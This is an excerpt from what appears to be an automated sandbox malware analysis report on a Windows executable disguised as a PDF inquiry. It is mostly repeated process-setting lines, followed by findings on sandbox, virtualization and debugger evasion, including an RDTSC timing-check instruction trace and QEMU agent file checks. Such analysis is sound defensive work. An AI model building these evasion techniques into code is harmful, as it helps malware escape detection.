          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior

          Malware Analysis System Evasion:

          Contains functionality to detect hardware virtualization (CPUID execution measurement)
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe Code function: 0_2_020E8484 NtWriteVirtualMemory,0_2_020E8484
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe Code function: 0_2_020E3801 NtWriteVirtualMemory,0_2_020E3801
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe Code function: 0_2_020E3648 NtWriteVirtualMemory,0_2_020E3648
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe Code function: 0_2_020E3E7A NtWriteVirtualMemory,0_2_020E3E7A
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe Code function: 0_2_020E4315 NtWriteVirtualMemory,0_2_020E4315
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe Code function: 0_2_020E7357 NtWriteVirtualMemory,0_2_020E7357
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe Code function: 0_2_020E6F55 NtWriteVirtualMemory,0_2_020E6F55
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe Code function: 0_2_020E4173 NtWriteVirtualMemory,0_2_020E4173
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe Code function: 0_2_020E71FE NtWriteVirtualMemory,0_2_020E71FE
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe Code function: 0_2_020E1FF9 NtWriteVirtualMemory,0_2_020E1FF9
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe Code function: 8_2_005630D1 LdrInitializeThunk,RtlAddVectoredExceptionHandler,LdrInitializeThunk,NtProtectVirtualMemory,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory,8_2_005630D1
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe Code function: 8_2_00563E7A LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,8_2_00563E7A
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe Code function: 8_2_005638DC LdrInitializeThunk,LdrInitializeThunk,8_2_005638DC
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe Code function: 8_2_00568484 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,8_2_00568484
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe Code function: 8_2_00567357 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,8_2_00567357
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe Code function: 8_2_0056357C LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,8_2_0056357C
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe Code function: 8_2_00566F60 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LoadLibraryA,8_2_00566F60
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe Code function: 8_2_00564315 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,8_2_00564315
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe Code function: 8_2_005671FE LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,8_2_005671FE
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe Code function: 8_2_00561FF9 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,8_2_00561FF9
          Tries to detect Any.run
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe File opened: C:\Program Files\qga\qga.exe
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: INQUIRY-11062020_PDF .exe, 00000000.00000002.290675824.00000000020E0000.00000040.00000001.sdmp, INQUIRY-11062020_PDF .exe, 00000008.00000002.322853008.0000000000560000.00000040.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe RDTSC instruction interceptor: First address: 0000000000401821 second address: 0000000000401821 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35ECC6C72Eh 0x00000004 call 00007F35ECC6C735h 0x00000009 add esp, 04h 0x0000000c call 00007F35ECC6C735h 0x00000011 add esp, 04h 0x00000014 cmp edi, 006FFF30h 0x0000001a jne 00007F35ECC6C683h 0x00000020 inc edi 0x00000021 call 00007F35ECC6C735h 0x00000026 add esp, 04h 0x00000029 call 00007F35ECC6C735h 0x0000002e add esp, 04h 0x00000031 jmp 00007F35ECC6C72Eh 0x00000033 call 00007F35ECC6C735h 0x00000038 add esp, 04h 0x0000003b rdtsc
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe Code function: 0_2_020E8484 rdtsc 0_2_020E8484
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe TID: 6912 Thread sleep count: 121 > 30
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe TID: 6900 Thread sleep time: -60000s >= -30000s
          Source: INQUIRY-11062020_PDF .exe, 00000000.00000002.290675824.00000000020E0000.00000040.00000001.sdmp, INQUIRY-11062020_PDF .exe, 00000008.00000002.322853008.0000000000560000.00000040.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

          Anti Debugging:

          Hides threads from debuggers
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe Thread information set: HideFromDebugger